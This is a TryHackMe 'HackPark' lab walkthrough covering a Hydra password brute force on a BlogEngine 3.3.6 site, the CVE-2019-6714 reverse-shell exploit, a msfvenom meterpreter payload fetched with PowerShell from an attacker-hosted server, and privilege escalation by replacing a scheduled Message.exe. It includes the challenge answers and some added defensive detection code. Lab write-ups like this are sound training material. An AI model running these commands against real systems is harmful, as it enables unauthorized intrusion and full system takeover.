Tryhackme walkthrough: Hackpark

Windows escalation privilege using multiple tools

hackpark walkthrough

Steps to completing this challenge

  • Reconnaissance
    Use nmap to find open ports.
  • Discovery and scanning
    Enumerate directories to uncover more attack surface using Dirbuster or Dirb. Check for software vulnerabilities.
  • Gain initial foothold
    Exploit the uncovered vulnerabilities.
  • Establishing persistence
    Start a meterpreter shell. Upload privilege escalation exploits.
  • Escalating privileges
    Execute the privilege escalation exploit. Run the root shell.

1. Reconnaissance

You can either browse to the target machine's IP address or run an nmap scan to find out what services are there.

What is the name of the clown displayed on the frontpage?
pennywise

2. Amazing blocks

Perform an nmap scan with an option to check for software versions (-sV) and to skip host discovery (-Pn).
nmap -sV -Pn [target IP address]

Nmap Scan
Dirbuster

3. Enumerate directories

Start Dirbuster by typing dirbuster. Choose one of the pre-set wordlists. I used directory-list-2.3-medium.txt in this instance.
The usual location for these wordlists is /usr/share/wordlists.

Dirbuster running

4. Dirbuster running

Dirbuster reports its progress both in its graphical interface and on the command line. One directory found that is worth looking into is

http://[IP address]/admin

Open it in your browser.

BlogEngine Creds

5. BlogEngine

We see that the website uses BlogEngine as its content management system. Let's do a Google search to find out what the default credentials are and whether we can use them.

Default credentials

6. BlogEngine default

Apparently, the default username and password are both admin.
Using them doesn't get us in, so now we attempt to find out what the password is. We'll use Burp Suite to help with this one.

7. Use BurpSuite and FoxyProxy

Toggle FoxyProxy on your browser to route traffic to 

BurpSuite capture

8. Capture the HTTP traffic sent when logging in

With Burp Suite intercepting traffic, we can take a closer look at what is being sent to the website.

We're going to use that long cryptic request to brute force the password with Hydra.

Inside the Request box, we're interested in lines 1 and 16. Line 1 contains the HTTP method and the path the credentials are sent to. In this case it's POST /Account/login.aspx?ReturnURL=%2Fadmin

Line 16 shows the form parameters sent to the website. We'll use that long text to tell Hydra where to substitute the username and password.

9. Using Hydra

You can always type hydra --help in the command prompt to find out how to use it. In this example, we are going to post this command:

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.84.88 http-post-form "/Account/login.aspx?ReturnURL=/admin:__VIEWSTATE=p52E5Ou%2FrrWaZJfz92Gx%2FfbpTzKoVM6sywhHUacCZjGLdRonH5QTP1mNXo6Jq1zqGPSjCjx1GW0JD3uK%2FA%2FhRbMYeIQe7X43l9h64%2BmsJm76y2cLnjW7pz4Ryn7HB35fO5iQCx4hkngHGjZYvU1b293j5U%2FrW%2B5mTebe5NHY%2Fp%2FSpmjkwJAQBJ%2FnuqJaZHMqT%2BBW5S2oR3KDpXHmcfY91thBwTqi9%2BSMnB8BZ5l5OkdYDiUlxFHzFlq5W0ursJgtX3ZSfAueXH4mX3fOaAPavgRDeNtIWPWXK1GGM0ZY93VGzHFQhU2ME1rtOZUhVvaFBcMLcvbBY%2FMO4DlZ0Ltr82UAGwz50SoDmVER8E8bc60p%2FXnd&__EVENTVALIDATION=4hWUNiJYjd%2F3Rm1qa7k9GUH%2FRDbBtz2hM7GNL%2BsyQ3QhWVe%2B0ezaK%2FIOB%2B7oJ9bQnn5xzEjvWhAwKaiW5y%2BnI3DthkRl8IRJH61NfmT9GgSZGcnliZMy5%2FrXhlHVtTDzsRkW35dolvtg71GPDhdooRXWAolAvwPL5WJ7hq4wfk%2Fn1dND&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login Failed" -vv

Explanation
-l admin: Hydra will not brute force the username; it sticks with admin.
-P /usr/share/wordlists/rockyou.txt: tells Hydra which password list to use.
10.10.84.88: the IP address of the machine you're attacking.
http-post-form: the login form is submitted with an HTTP POST, so Hydra uses its http-post-form module.
^USER^: tells Hydra where to insert the username you provided above, which is admin.
^PASS^: tells Hydra where to insert each password from the wordlist. Hydra knows what to do with it.
:Login Failed: the text the website returns when a login attempt fails; Hydra treats any response without it as a success.

Hydra completed

Hydra figures out the password: 1qaz2wsx
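From the defender's side, the same brute force is easy to spot in the web server's logs. The following Python is an added example (not part of the walkthrough or of Hydra): it scans constructed IIS W3C-style log lines for a burst of POSTs to /Account/login.aspx from one client and notes whether a redirect (a successful login) followed the failures. The log lines, the field layout and the assumption that a failed login answers with HTTP 200 and a successful one with 302 are mine.

```python
# Added example, not from the walkthrough: flag a Hydra-style password
# brute force against BlogEngine's login form in IIS W3C-format logs.
# Assumed: a failed login re-renders the form with HTTP 200 (the "Login
# Failed" text Hydra matches on); a successful login redirects with 302.
from collections import defaultdict
from datetime import datetime, timedelta
LOGIN_PATH = "/Account/login.aspx"

def build_sample_log(attempts=40):
    """Constructed W3C lines (date time s-ip method path query port user c-ip ua
    status): one client guesses once per second and the last guess succeeds;
    an unrelated client logs in normally."""
    start, lines = datetime(2019, 8, 3, 10, 50, 0), []
    for i in range(attempts):
        ts, status = start + timedelta(seconds=i), (302 if i == attempts - 1 else 200)
        lines.append(f"{ts:%Y-%m-%d %H:%M:%S} 10.10.84.88 POST {LOGIN_PATH} "
                     f"ReturnURL=%2Fadmin 80 - 10.9.2.209 Mozilla/5.0+(Hydra) {status}")
    lines.append("2019-08-03 09:12:44 10.10.84.88 POST /Account/login.aspx "
                 "ReturnURL=%2Fadmin 80 - 192.168.1.50 Mozilla/5.0 302")
    return lines

def parse(line):
    """Pick the fields we need out of one W3C line; None for comments/garbage."""
    f = line.split()
    if line.startswith("#") or len(f) < 11:
        return None
    return {"ts": datetime.strptime(f[0] + " " + f[1], "%Y-%m-%d %H:%M:%S"),
            "method": f[3], "path": f[4], "client": f[8], "status": int(f[10])}

def find_login_bruteforce(lines, threshold=10, window=timedelta(seconds=60)):
    """Return {client_ip: (peak failures inside `window`, success seen after them)}
    for every client that reaches `threshold` failed login POSTs."""
    by_client = defaultdict(list)
    for rec in filter(None, map(parse, lines)):
        if rec["method"] == "POST" and rec["path"].lower() == LOGIN_PATH.lower():
            by_client[rec["client"]].append(rec)
    hits = {}
    for ip, recs in by_client.items():
        recs.sort(key=lambda r: r["ts"])
        failures = [r for r in recs if r["status"] == 200]
        peak, j = 0, 0
        for i in range(len(failures)):            # sliding window over failures
            while failures[i]["ts"] - failures[j]["ts"] > window:
                j += 1
            peak = max(peak, i - j + 1)
        if peak >= threshold:
            last_fail = failures[-1]["ts"]
            success = any(r["status"] in (301, 302) and r["ts"] >= last_fail for r in recs)
            hits[ip] = (peak, success)
    return hits
```

A client reported with success=True is the case that matters most: the password was found, so the account should be treated as compromised, not just rate-limited.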

10. Use the credentials we found

Go to http://10.10.84.88/admin (use the IP address of your target machine) and log in with username admin and password 1qaz2wsx.

Backend

11. Backend Access

We now have access to the administrator panel of the blog. We can create, edit, and delete posts. We can also upload files, including a possible exploit we can use to compromise the computer.

BlogEngine 3.3.6

12. About the Blogging Software

Snoop around. Click the About section of the software and we can see it's BlogEngine 3.3.6. We can use that information to look for known vulnerabilities in this specific software version.

Exploit

13. Exploit Database

Thanks to some ultra-nerds, there is a website where we can search for and download exploits that real hackers have already created. Go to https://www.exploit-db.com for that.

Search for blogengine 3.3.6. We are given a handful of possible exploits. We're going to pick the one created by Dustin Cobb on February 12, 2019.

Exploit contents

14. What is the CVE? CVE-2019-6714

Obtain the exploit

View it in raw format, then copy and paste it into your text editor.

15. Download the exploit

- You can view the exploit in its raw format or
- Download the file

46353 Instructions

Exploit is named 46353

16. Follow the instructions

The first lines of the exploit outline how to use it:
1. Edit the exploit 46353

2. Tell the exploit to talk to your computer by...

3. Locating this line:
using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("10.10.10.20", 4445))

4. Change the 10.10.10.20 to your IP address

5. Change 4445 to 4444 (or whatever you want, just remember it when you establish a listening port)

6. Save the file as PostView.ascx.cs

ip a

Your own IP address

17. Find out your IP address

If you don't know your IP address (or your VPN tunnel IP address), enter ip a at your command prompt.

Then use it to modify the exploit file.

Admin backend

18. Go back to the blog backend

Go back to your browser. Click the existing post and edit it. We will use that post to upload the exploit PostView.ascx.cs

19. Upload the exploit

This video shows how to upload the exploit

Netcat listening

20. Prepare your machine to receive communication from the hacked website

We'll use Netcat to wait for a connection from the target machine. Enter this on your command prompt:

nc -nvlp 4444

Explanation
nc: Netcat

-n: do not resolve names
-v: be verbose when a connection happens
-l: listen for a connection at...
-p: port number...

4444: This is the port you specified on #16 above.

21. Execute the exploit

Open a new browser tab. Point your browser to http://[Target IP]/?theme=../../App_Data/files. In this case it will be
http://10.10.84.88/?theme=../../App_Data/files

Your browser tab will look like it has frozen or has not finished loading. Ignore it. Go back to your command prompt and check Netcat.
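The theme parameter above is the path traversal of CVE-2019-6714: the value is joined onto the themes folder, so the ../ segments walk into App_Data/files where the uploaded file sits. The Python below is an added illustration (not BlogEngine's code) showing the naive lookup next to a hardened one that allowlists the name and verifies the resolved path stays under the themes root; THEMES_ROOT and the theme names are hypothetical.

```python
# Added example, not BlogEngine's code: why ?theme=../../App_Data/files escapes
# the themes folder (CVE-2019-6714) and how a server-side guard stops it.
# THEMES_ROOT and the theme names are hypothetical.
import os
import re
from urllib.parse import unquote

THEMES_ROOT = "/srv/blog/Custom/Themes"
THEME_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}")   # allowlist: no separators, no dots

def weak_theme_path(theme):
    """Naive lookup: the request parameter is joined straight onto the root,
    so '..' segments walk out of THEMES_ROOT into App_Data/files."""
    return os.path.normpath(os.path.join(THEMES_ROOT, unquote(theme)))

def safe_theme_path(theme):
    """Hardened lookup: allowlist the name, then verify the resolved path is
    still under THEMES_ROOT. Raises ValueError for anything else."""
    # Decode first; '%' is not in the allowlist, so a double-encoded value
    # (or one the framework already decoded) is still rejected.
    theme = unquote(theme)
    if not THEME_NAME.fullmatch(theme):
        raise ValueError(f"invalid theme name: {theme!r}")
    root = os.path.abspath(THEMES_ROOT)
    candidate = os.path.abspath(os.path.join(root, theme))
    if os.path.commonpath([root, candidate]) != root:   # second line of defence
        raise ValueError("theme path escapes THEMES_ROOT")
    return candidate

def classify(theme):
    """'allowed' or 'blocked' for a requested ?theme= value."""
    try:
        safe_theme_path(theme)
        return "allowed"
    except ValueError:
        return "blocked"
```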

whoami

whoami reveals iisapppool\blog

22. Connection established

Netcat will display a message when a connection has been established. You will see a blank prompt. The target is a Windows machine, so the command to list directory contents is dir.

whoami

iisapppool\blog

23. Who is the webserver running as?

Type whoami at the command prompt to find out which user account the compromised web server process is running as.

create meterpreter shell


24. Escalate the privilege by creating a meterpreter shell

25. msfvenom -p /windows/meterpreter/reverse_tcp LHOST=10.9.2.209 LPORT=4445 -f exe > shell.exe

The machine is compromised. However, we are not root (Administrator), and that's what we want so we get ALL the privileges. For that, we will create a meterpreter shell to upload to the compromised machine using the command msfvenom. Explanation below.

/windows/meterpreter/reverse_tcp: the payload will make a reverse connection back to us over TCP.

LHOST=10.9.2.209: local host, which is your IP address. You determined that earlier using the command ip a, as shown in step 17.

LPORT=4445: another listening port. Remember 4444 is already in use by your current connection.

-f exe > shell.exe: create an executable file named shell.exe.

Python http server

26. Find a way for the target machine to download the exploit we created

It's a good thing Python got that covered. Inside the command prompt you used to create the meterpreter shell, type this command:

python3 -m http.server 8000

This will start an HTTP server listening on port 8000. To verify your HTTP server, open a new browser tab and go to [your IP address]:8000; in this case, that's 10.9.2.209:8000.

You should see the files in the directory where you created shell.exe.

Access the meterpreter shell

powershell download

27. Download the meterpreter shell using powershell

From the command prompt at the target machine, enter the command:

powershell -c "Invoke-WebRequest -Uri 'http://10.9.2.209:8000/shell.exe' -OutFile 'C:\Windows\Temp\shell.exe'"

This tells the target machine to use PowerShell to download the file from your web server at 10.9.2.209:8000/shell.exe and save it in its C:\Windows\Temp\ directory.

C:\Windows\Temp\shell.exe

28. Verify shell.exe has been downloaded

Type these

cd c:\windows\temp\

and then

dir

You should now see shell.exe inside the C:\Windows\Temp folder.

msfconsole

msfconsole starting

29. Set the conditions to receive the meterpreter shell communication

The Meterpreter shell works with Metasploit. We will start Metasploit before executing the shell.exe on the remote machine. Start it by running:

msfconsole

Exploit Multi Handler

30. Choose the meterpreter shell handler in Metasploit

Within msfconsole, we will use the exploit multi handler. Type

use exploit/multi/handler

msfconsole options

Set handler options

31. Set handler options

We have to set the proper options so shell.exe will communicate correctly with our Metasploit listener. Enter:

show options

set LHOST [YOUR IP Address] and in this case
set LHOST 10.9.2.209

set LPORT 4445

We are telling MSF to listen on port 4445. Remember we told shell.exe to talk to 10.9.2.209 on port 4445.

Verify options

32. Verify options are correct

You don't have to do this but it's good practice to do so.

32a. Execute the Metasploit listener. Enter:

run

33. Execute the exploit from the target machine

Running shell.exe on the target machine will start the meterpreter shell. It will communicate with Metasploit and let us do more. Go back to the Netcat window with the Windows command prompt on the remote machine.

Navigate to C:\Windows\Temp if you're not there yet.
cd C:\Windows\Temp

Run shell.exe. Enter:
shell.exe

Reverse shell

Started reverse TCP handler on 10.9.2.209:4445

34. Check for a new connection

Go back to your Metasploit prompt window.

You should see the run command you entered when you started the listener.

And on the next line:
Started reverse TCP handler on 10.9.2.209:4445

Sysinfo

35. Start looking around

We can get more info about the compromised machine by typing the command

sysinfo

winPEAS

36. Download winPEAS

winPEAS is a program we will run on the remote machine to gather even more information. What we're looking for is a way to execute an exploit, or a shell, in administrator mode. This will allow us to go into restricted folders and access restricted files.

Do a Google search or you can point another browser tab to:
https://github.com/carlospolop/PEASS-ng

Git clone winPEAS

37. Git clone winPEAS

From your hacking machine, navigate to the folder where you want winPEAS to be located. Then clone PEASS-ng onto your machine by copying and pasting the command from GitHub into your command prompt. Type:

git clone https://github.com/carlospolop/PEASS-ng

find winPEAS

38. Explore PEASS-ng

Now that the repository has been cloned, look around to see what it contains. winPEAS is just one of its components; it's a tool for gathering information about Windows machines, and the repository holds other utilities for other systems. Type these commands:

cd PEASS-ng

cd winPEAS

ls

You will see that winPEAS is simply a .bat file: a Windows batch file containing a list of commands to execute.

39. Make winPEAS downloadable

Copy winPEAS.bat to the folder where you are hosting your files on the Python web server you started on Step #26. 

powershell again

40. Download winPEAS using PowerShell

Now that we're hosting winPEAS and it's accessible to the target machine, we will download it.

Go to your command prompt window running Windows.

Enter the PowerShell command
powershell -c "Invoke-WebRequest -Uri 'http://10.9.2.209:8000/winPEAS.bat' -OutFile 'C:\Windows\Temp\winPEAS.bat'"

winPEAS downloaded

winPEAS has been fetched from the web server

41. Check if winPEAS has been accessed

You should see three lines showing the request it received, the machine's response, and the file that has been downloaded.

winPEAS confirmation

42. Check out winPEAS from the remote machine

Go back to the command prompt window running the Windows prompt in the remote machine. List the directory contents by entering

dir

Then run it by typing

winPEAS

43. winPEAS in action

winPEAS will look up a lot of information about the target machine. Sit back and enjoy.

44. Go through winPEAS' results

Somewhere in the video above, at approximately the 0:17 mark, winPEAS lists the running processes and services. These are programs that run in the background. Many of them were started by the system and therefore run at the system level. The one of interest is called Windows Scheduler, running as WScheduler.exe.

What service is interesting?
Windows Scheduler or WScheduler.exe

What is the Windows Build? 
Windows 2012 R2 (6.3 Build 9600)



Scheduler

45. Take a closer look at Scheduler

From the Windows command prompt, find the location of the Scheduler program. It is located at

C:\Program Files (x86)\SystemScheduler\

Enter
cd "c:\Program Files (x86)\SystemScheduler"

46. Poke around the directory

There are two files worth checking out right away -- 20198415519.INI and 20198415519.INI_LOG.txt. To quickly view the contents, enter

type 20198415519.INI

Nothing much there, except that it was run by Administrator. We're on the right track.

type 20198415519.INI_LOG.txt

47. Check out 20198415519.INI_LOG.txt

We are doing this to look for a way to run shell.exe as Administrator. Right now, shell.exe is running under another local account that doesn't have much authority: iisapppool\blog, as you saw in Step #22.

One of the programs being executed every few minutes is Message.exe. It must run with Administrator privileges because Administrator runs it.

48. Replace it: send in the impostor

We know that Message.exe is executed every five minutes, so we will try to replace it.

Copy shell.exe into the folder where Message.exe resides, rename the original out of the way, and rename shell.exe to Message.exe. On your command prompt, enter these (the path contains spaces, so quote it):

cd C:\Windows\Temp

copy shell.exe "c:\Program Files (x86)\SystemScheduler"

cd "c:\Program Files (x86)\SystemScheduler"

ren Message.exe Message.bak

ren shell.exe Message.exe
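What makes this step possible is a directory ACL that lets a low-privileged account overwrite a binary Administrator executes. The Python below is an added audit example (not from the walkthrough or PEASS-ng): it parses icacls-style output for the scheduler directory and reports any low-privileged principal holding a write-capable right, with a weak ACL next to a corrected one. The icacls text, the directory path and the principal list are constructed assumptions.

```python
# Added example, not from the walkthrough or PEASS-ng: audit whether a
# scheduler's program directory grants write access to low-privileged
# principals, which is what lets a planted Message.exe run as Administrator.
# The icacls output below is constructed for illustration.
import re

SCHEDULER_DIR = r"C:\Program Files (x86)\SystemScheduler"
# Principals that must never be able to write where Administrator runs binaries.
# "iisapppool\blog" is the web server identity whoami printed in the walkthrough.
LOW_PRIV = {"everyone", "builtin\\users", "nt authority\\authenticated users",
            "iisapppool\\blog"}
# icacls simple and specific rights that allow creating or replacing files.
WRITE_RIGHTS = {"F", "M", "W", "D", "GW", "WD", "AD", "DC"}

ACE_RE = re.compile(r"^(?P<who>[^:]+):(?P<flags>(?:\([^)]*\))+)$")

def parse_icacls(output, path):
    """Yield (principal, set of right/inheritance tokens) for each ACE line."""
    for raw in output.splitlines():
        line = raw.strip()
        if line.startswith(path):               # first ACE shares the path's line
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if not m:
            continue                            # blank or summary line
        tokens = set()
        for group in re.findall(r"\(([^)]*)\)", m["flags"]):
            tokens.update(t.strip() for t in group.split(","))
        yield m["who"].strip(), tokens

def low_priv_writers(output, path):
    """Sorted list of low-privileged principals holding a write-capable right."""
    return sorted(who for who, tokens in parse_icacls(output, path)
                  if who.lower() in LOW_PRIV and tokens & WRITE_RIGHTS)

WEAK_ACL = rf"""{SCHEDULER_DIR} Everyone:(OI)(CI)(F)
                                   BUILTIN\Users:(I)(OI)(CI)(RX)
                                   NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                                   BUILTIN\Administrators:(I)(OI)(CI)(F)

Successfully processed 1 files; Failed processing 0 files
"""

HARDENED_ACL = rf"""{SCHEDULER_DIR} BUILTIN\Users:(OI)(CI)(RX)
                                   NT AUTHORITY\SYSTEM:(OI)(CI)(F)
                                   BUILTIN\Administrators:(OI)(CI)(F)
"""
```

On a real host the text would come from running icacls on the directory; an empty result for every directory a scheduled task reads its binary from is the state to aim for.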

Administrator shell

49. Prepare to receive a connection from the new exploit running as Administrator

We have a current Meterpreter session from the shell.exe executed by iisapppool\blog earlier from Step #22.

We will close that by entering exit.

Then simply running the same command

run

Wait a few seconds, because there is a pause between Message.exe executions.

50. Receive the new shell connection

You don't have to run the shell command to see the Windows interface. You can poke around using the Metasploit prompt.

51. Look for flags

First, we'll verify that we are running as root or as an administrator.

Enter shell from your Metasploit prompt. This will change the command prompt into a Windows command prompt.

Then run whoami. It will show that you are running as Administrator.

The flags are located in:

C:\Users\jeff\Desktop

C:\Users\Administrator


What is the abnormal service running?
WindowsScheduler

What is the binary you're supposed to exploit?
Message.exe

52. Last question

We can also find the answer when we type sysinfo.


Original Install Time
8/3/2019, 10:43:23 AM

Happy hacking!